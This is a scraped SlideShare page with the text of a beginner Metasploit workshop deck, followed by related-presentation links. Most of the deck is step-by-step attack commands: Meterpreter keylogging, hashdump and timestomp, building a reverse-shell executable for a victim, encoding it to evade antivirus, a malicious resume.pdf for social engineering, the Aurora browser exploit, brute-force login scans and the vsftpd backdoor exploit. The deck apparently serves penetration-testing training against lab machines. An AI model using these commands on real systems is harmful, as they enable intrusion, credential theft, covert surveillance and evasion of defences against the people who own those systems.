SlideShare a Scribd company logo
By : Ajay Srivastava
Please don’t expect ….
 How to evade antiviruses (antivirus evasion)
 How to do pivoting
 How to do port forwarding
 How to write your own metasploit module
Disclaimer
All the information or technique you will be
learning here is for educational purpose and
should not be used for malicious activities.
Agenda
 Introduction
 Basics of Metasploit
 Information gathering
 Exploitation
 ( 11:30-11:45 - Break 1/ Tea )*
 Meterpreter Basics
 Post exploitation using meterpreter
 Meterpeter scripts
 ( 1:00 – 2:00 - Break 2 / Lunch )*
Agenda
 Metasploit utilities
 Client-side exploitation
 ( 4:00-4:20 – Break 3 / Tea )*
 Auxiliary module
 And we are done 
 * Lunch and Tea are self sponsored.
Introduction
 It’s not a Tool, it’s a Framework !!!
History
 Developed by H.D Moore in 2003
 Originally written in Perl & later on rewritten in Ruby
 Acquired by Rapid7 in 2009
 Remains open source & free for use
Metasploit Architecture
Libraries
 Rex :
 The basic library for most tasks
 Handles sockets and protocols
 MSF CORE :
 Defines the Metasploit Framework
 Provides the ‘basic’ API
 MSF BASE :
 Provides the ‘friendly’ API
 Provides simplified APIs for use in the Framework
Modules
 Exploit
 Modules used for actually attacking the systems and
grabbing the access.
 Payload
 Piece of code which executes on remote system after
successful exploitation.
 Auxiliary
 Exploit without payload. Used for scanning, fuzzing &
doing various tasks.
Modules
 Encoders
 Program which encodes our payload to avoid antivirus
detection
 Nops
 Used to keep payload size consistent
Payloads
 Single
 Completely standalone
 eg: Add user
 Stagers
 Creates the network connection
 Stages
 Downloaded by the stagers
 eg: Meterpreter
Payloads
 Payload is staged if represented by ‘/’ in the payload
name
 Windows/shell_bind_tcp
 single payload with no stage
 Windows/shell/bind_tcp
 a stager (bind_tcp)
 a stage (shell)
Interfaces
 MSFCONSOLE
 MSFCLI
 MSFWEB
 Armitage
MSFCONSOLE
 Most powerful interface among all interfaces
MSFCLI
MSFWEB
Armitage
 Graphical version of Metasploit
 Developed by Raphel Mudge
 Supports both GUI & CLI
Armitage
Basics Commands
 #msfconsole
 #msfupdate
 MSFConsole commands are classified in two types :
 Core Commands
 Database commands
Core Commands
 help or ?
 banner
 version
 show
 search
 msf>search <module name>
 info
 msf>info <module name>
 use
 msf>use <exploit/auxiliary name>
Core Commands
 back
 show options
 set
 msf>set <option> <value>
 setg
 msf>set <option> <value>
 unset
 msf>set <option> <value>
 unsetg
 msf>set <option> <value>
Core Commands
 show payloads
 set payload
 msf>set payload <payload name>
 check
 exploit
 run
Database Commands
 Default database : PostgreSQL
 Database.yml
 /opt/metasploit/apps/pro/ui/config/database.yml
 # cat database.yml
 db_status
 db_disconnect
Database Commands
 Db_connect
#db_connect
user:pass@localhost:port/dbname
OR
#db_connect –y <path of database.yml>
Database Commands
 db_nmap
 # db_nmap –sV –A –O <ip range>
 hosts
 # hosts –h
 services
 # services
Database Commands
 vulns
 db_export
 db_import
 db_rebuild_cache
 creds
 db_load
 db_unload
Information Gathering
 Auxiliary modules are the best !!!
 Will cover in detail later
 Using auxiliary/scanner/portscan/tcp
 # msf>auxiliary/scanner/portscan/tcp
Or
 nmap <switches> <ip address>
Exploitation
 To list available exploits :
 msf> search <exploit name>
 To select an exploit :
 msf> use <exploit name>
 To get information about selected exploits
 msf/exploitname> info
 To check the options and set arguments
 msf/exploitname> show options
 To set the target host
 msf/exploitname> set rhost <victim ip>
Exploitation
 To list supported payload with selected exploit
 msf/exploitname> show payloads
 To set the payload
 msf/exploitname> set payload <payload name>
 To set attacker machine
 msf/exploitname> Set lhost <own ip>
 To check if target is vuln to selected exploit
 msf/exploitname> Check
 To launch the attack
 msf/exploitname> exploit
Metasploit Humla for Beginner
Meterpreter
 Post exploitation module
 Runs in the exploited process context
 Runs in memory and doesn’t create any file on disk
 Encrypted communication
 Stable and extensible
Meterpreter
 Classification
 Core commands
 File system commands
 System commands
 User interface commands
 Priv commands
 Networking commands
Meterpreter : Core commands
 background
 sessions
 ps
 migrate
 bgrun/bglist/bgkill
 resource
Meterpreter : Core commands
 Run
 #msf>run <script name>
 Channel
 #msf>execute –f <program> -c
 Use
 #msf>use <extension name>
Meterpreter:File System
Commands
 pwd
 cd
 getlwd/getlcd
 ls
 cat/edit
 download/upload
Meterpreter:File System
Commands
 search
 #msf>search –d <directory> -f *.<fileformat> -r
 mkdir/rmdir
 rm/rmdir
 del
Meterpreter : System Commands
 sysinfo
 getpid/getuid
 shell
 reboot
 shutdown
 ps
Meterpreter : UI Commands
 User interface & Webcam commands
 idletime
 keyscan_start
 keyscan_dump
 keyscan_stop
 webcam_list
 webcam_snap
Meterpreter : Privs Commands
 getsystem
 hashdump
 timestomp
 timestomp –h
 timestomp <filepath> -v { to display all atributes}
 timestomp <filepath> -c <MM/DD/YYYY H:M:S>
Meterpreter: Networking
commands
 arp
 ipconfig/ifconfig
 netstat
 route
 portfwd
Meterpreter scripts
 Path :
 /usr/share/metasploit-framework/scripts/meterpreter
 Or
 meterpreter>run <tab multiple times>
Meterpreter scripts run <script name>
 run checkvm
 run credcollect
 run keylogrecorder
 run winenum
 run getcountermeasure
 run getgui
Meterpreter scripts
 run scraper
 run hostedit
 run gettelnet
 run arpscanner
 run vnc
 run filecollector
 #msf>run filecollector –d <dnm> -f *.txt -r
Metasploit Humla for Beginner
Metasploit Utilities
 Three main utilities to generate shellcode and to evade
antiviruses
 Msfpayload
 Msfencode
 Msfvenom
Msfpayload
 To generate payload in different formats as exe ,C , Ruby and
javascript
 Using msfpayload :
 root@kali:~# msfpayload -h
 To check options
 root@kali:~# msfpayload <payload name> O
 root@:~# msfpayload
windows/meterpreter/reverse_tcp O
 Setting the options
 root@kali:~# msfpayload
windows/meterpreter/reverse_tcp LHOST=<attacker
ip> LPORT=4422 X > exploit.exe
 Sending this exploit.exe to victim
Using Mutli-handler Exploit /
setting listener
 Setup listner:
 msf > search multi/handler
 msf > use exploit/multi/handler
 msf exploit(handler) > set payload
windows/meterpreter/reverse_tcp
 msf exploit(handler) > show options
 msf exploit(handler) > set lhost
<attacker ip>
 msf exploit(handler) > set lport 4422
 msf exploit(handler) > exploit
MSFEncode
 To bypass antiviruses
 Alters code , by converting into binary EXE. While
interacting back , it will decode and execute the same
into memory.
 Payload is encoded by different encoders
MSFEncode
 root@kali:~# msfencode -h
 Usage: /opt/metasploit/apps/pro/msf3/msfencode
<options>
 OPTIONS:
 -e <opt> The encoder to use
 -c <opt> The number of times to encode the data
 -t <opt> The output format:
bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
 -x <opt> Specify an alternate executable template
 -k Keep template working; run payload in new thread
(use with -x)
MSFEncode
 list encoders:
 root@kali:~# msfencode –l
 msfencode with msfpayload:
 root@kali:~# msfpayload
windows/meterpreter/reverse_tcp
LHOST=<attacker ip> LPORT=4422 R |
msfencode -e x86/shikata_ga_nai -c 8 -t
exe > /var/www/exploitbypass.exe
Client-side Attacks
 Difficult to find server-side vulnerabilities
 Most enterprises have incoming connections locked
down with firewalls
 Client-side attacks are the most common ones:
- Browser based attacks
- Social engineering attacks using malicious link or file
Client-side Attacks:Browser based
 Using IE 6 based Aurora exploit
 msf > search aurora
 msf > use exploit/windows/browser/ms10_002_aurora
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set srvhost
<attacker ip>
 msf exploit(ms10_002_aurora) > set srvport 80
 msf exploit(ms10_002_aurora) > set uripath /test
Client-side Attacks:Browser based
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set lhost <own
ip>
 msf exploit(ms10_002_aurora) > set lport 443
 msf exploit(ms10_002_aurora) > exploit
Client-side Attacks:File Format
 Nowadays file format based exploits are exploiting
targets in wild.
 File formats such as pdf , doc or rtf are sent as
attachment to the victim and expected to open it.
 For eg:
 Adobe util.printf() Bufferoverflow vulnerability
 MS14-017 Microsoft Word RTF Object Confusion
Client-side Attacks:File Format
 Exploiting Adobe util.printf() Bufferoverflow vulnerability
 msf > search adobe_utilprintf
 msf > use
exploit/windows/fileformat/adobe_utilprintf
 msf exploit(adobe_utilprintf) > set filename
resume.pdf
 msf exploit(adobe_utilprintf) > show options
 msf exploit(adobe_utilprintf) > set payload
windows/meterpreter/reverse_tcp
Client-side Attacks:File Format
 msf exploit(adobe_utilprintf) > setg
lhost <attacker ip>
 msf exploit(adobe_utilprintf) > set
lport 443
 msf exploit(adobe_utilprintf) > exploit
 Setup listener(i.e multi/handler)
 Send this resume.pdf using some social engineering
techniques.
Client-side Attacks:File Format
 Setting up listener on local machine :
 msf > search multi/handler
 msf > use exploit/multi/handler
 msf exploit(handler) > show options
 msf exploit(handler) > set lhost <own
ip>
 msf exploit(handler) > set lport 443
 msf exploit(handler) > exploit
Metasploit Humla for Beginner
Auxiliary Modules
 Pre-exploitation module
 Port scanners, fuzzers, banner grabbers, brute-force
module etc.
 Path:
 /usr/share/metasploit-framework/modules/auxiliary
or
 Using show auxiliary on msfconsole :
 msf > show auxiliary
 Used without payloads
Auxiliary Modules
 Used same as exploits but without payload
 msf> use <auxiliary name>
 ‘run’ command instead of ‘exploit’ command
 RHOSTS instead of RHOST
Auxiliary Modules : Port scanners
 Portscanner auxiliary module used for port scanning
 Using portscanners :
 msf > search portscan
 msf > use auxiliary/scanner/portscan/tcp
 msf auxiliary(tcp) > show options
 msf auxiliary(tcp) > set rhosts <target>
 msf auxiliary(tcp) > set ports 1-100
 msf auxiliary(tcp) > set threads 10
 msf auxiliary(tcp) > run
Auxiliary Modules :
SMB version fingerprinting
 msf > search smb_version
 msf > use auxiliary/scanner/smb/smb_version
 msf auxiliary(smb_version) > show options
 msf auxiliary(smb_version) > set rhosts
192.168.37.0/24
 msf auxiliary(smb_version) > set threads 10
 msf auxiliary(smb_version) > run
Auxiliary Modules : Version
Scanner
 Banner grabbing of MySQL server :
 msf > search MySQL
 msf > use auxiliary/scanner/mysql/mysql_version
 msf auxiliary(mysql_version) > show options
 msf auxiliary(mysql_version) >set rhosts
<target>
 msf auxiliary(mysql_version) > run
Auxiliary Modules: Login Scanners
 Testing login attack on MySQL :
 msf > use auxiliary/scanner/mysql/mysql_login
 msf auxiliary(mysql_login) > show options
 msf auxiliary(mysql_login) > setg rhosts
<target>
 msf auxiliary(mysql_login) > set user_file
userfile.txt
Auxiliary Modules: Login Scanners
 msf auxiliary(mysql_login) > set pass_file
passfile.txt
 msf auxiliary(mysql_login) > set stop_on_success
true
 msf auxiliary(mysql_login) > run
Auxiliary Modules : Telnet
 msf > search telnet_login
 msf > use auxiliary/scanner/telnet/telnet_login
 msf auxiliary(telnet_login) > show options
 msf auxiliary(telnet_login)) > setg rhosts
<target ip>
 msf auxiliary(telnet_login) > set user_file
userfile.txt
Auxiliary Modules : Telnet
 msf auxiliary(telnet_login) > set
pass_file passfile.txt
 msf auxiliary(telnet_login) > set
stop_on_success true
 msf auxiliary(telnet_login) > run
 Verify:
 root@kali:~# telnet <target ip>
Auxiliary Modules : Attacking FTP
 msf > search ftp_version
 msf > use auxiliary/scanner/ftp/ftp_version
 msf auxiliary(ftp_version) > show options
 msf auxiliary(ftp_version) > set rhosts <target>
 msf auxiliary(ftp_version) > run
 Result on metasploitable2: FTP Banner: '220 (vsFTPd
2.3.4)
Auxiliary Modules : Attacking FTP
 Now checking for ftp login
 msf > search ftp_login
 msf > use auxiliary/scanner/ftp/ftp_login
 msf auxiliary(ftp_login) > set rhosts <target
ip>
 msf auxiliary(ftp_login) > set user_file
userfile.txt
 msf auxiliary(ftp_login) > set pass_file
passfile.txt
 msf auxiliary(ftp_login) > set stop_on_success
true
 msf auxiliary(ftp_login) > run
 Successful FTP login for 'msfadmin':'msfadmin'
Auxiliary Modules : Attacking FTP
 From FTP version scan we know its version is vsFTPd
2.3.4
 Now looking for exploit of this FTP version
 msf > search vsFTPd 2.3.4
 msf > use exploit/unix/ftp/vsftpd_234_backdoor
 msf exploit(vsftpd_234_backdoor) > show options
 msf exploit(vsftpd_234_backdoor) > set rhost
<target ip>
 msf exploit(vsftpd_234_backdoor) > show payloads
 msf exploit(vsftpd_234_backdoor) > set payload
cmd/unix/interact
 msf exploit(vsftpd_234_backdoor) > exploit
Metasploit Humla for Beginner
References
 Metasploit Guide,
http://packetstormsecurity.com/files/119280,
 Securitytube Metasploit Framework Expert (SMFE
course by Vivek Ramachandran)
 Metasploit Unleashed ,
 http://www.offensive-security.com/metasploit-
unleashed/Main_Page
Metasploit Humla for Beginner

More Related Content

What's hot

Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤
jack51706
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
Antonio Fontes
 
Nmap
NmapNmap
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
Wannacry
WannacryWannacry
Nikto
NiktoNikto
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
Surya Subhash
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
SouvikRoy114738
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systems
Andrea Bissoli
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Virtual honeypot
Virtual honeypotVirtual honeypot
Virtual honeypot
Elham Hormozi
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
n|u - The Open Security Community
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
Automatisation des tests - objectifs et concepts - partie 2
Automatisation des tests  - objectifs et concepts - partie 2Automatisation des tests  - objectifs et concepts - partie 2
Automatisation des tests - objectifs et concepts - partie 2
Christophe Rochefolle
 
Metasploitable
MetasploitableMetasploitable

What's hot (20)

Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
Nmap
NmapNmap
Nmap
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Wannacry
WannacryWannacry
Wannacry
 
Nikto
NiktoNikto
Nikto
 
Metasploit
MetasploitMetasploit
Metasploit
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systems
 
Metaploit
MetaploitMetaploit
Metaploit
 
Virtual honeypot
Virtual honeypotVirtual honeypot
Virtual honeypot
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
Automatisation des tests - objectifs et concepts - partie 2
Automatisation des tests  - objectifs et concepts - partie 2Automatisation des tests  - objectifs et concepts - partie 2
Automatisation des tests - objectifs et concepts - partie 2
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 

Similar to Metasploit Humla for Beginner

Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
Kasper de Waard
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
Nutan Kumar Panda
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Dev ops
Dev opsDev ops
Dev ops
Tom Hall
 
Metapwn
MetapwnMetapwn
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The  Ultimate Attack  Platform for Metasploit Armitage – The  Ultimate Attack  Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
Ishan Girdhar
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix Commands
MeenalJabde
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with Monit
OSOCO
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
webhostingguy
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
webhostingguy
 

Similar to Metasploit Humla for Beginner (20)

Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Dev ops
Dev opsDev ops
Dev ops
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The  Ultimate Attack  Platform for Metasploit Armitage – The  Ultimate Attack  Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix Commands
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with Monit
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 

More from n|u - The Open Security Community

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Metasploit primary
Metasploit primaryMetasploit primary
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Android Pentesting
Android PentestingAndroid Pentesting

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdfThe Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
JackieSparrow3
 
The Cruelty of Animal Testing in the Industry.pdf
The Cruelty of Animal Testing in the Industry.pdfThe Cruelty of Animal Testing in the Industry.pdf
The Cruelty of Animal Testing in the Industry.pdf
luzmilaglez334
 
How to Create a New Article in Knowledge App in Odoo 17
How to Create a New Article in Knowledge App in Odoo 17How to Create a New Article in Knowledge App in Odoo 17
How to Create a New Article in Knowledge App in Odoo 17
Celine George
 
How to Empty a One2Many Field in Odoo 17
How to Empty a One2Many Field in Odoo 17How to Empty a One2Many Field in Odoo 17
How to Empty a One2Many Field in Odoo 17
Celine George
 
matatag curriculum education for Kindergarten
matatag curriculum education for Kindergartenmatatag curriculum education for Kindergarten
matatag curriculum education for Kindergarten
SarahAlie1
 
How To Update One2many Field From OnChange of Field in Odoo 17
How To Update One2many Field From OnChange of Field in Odoo 17How To Update One2many Field From OnChange of Field in Odoo 17
How To Update One2many Field From OnChange of Field in Odoo 17
Celine George
 
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
thanhluan21
 
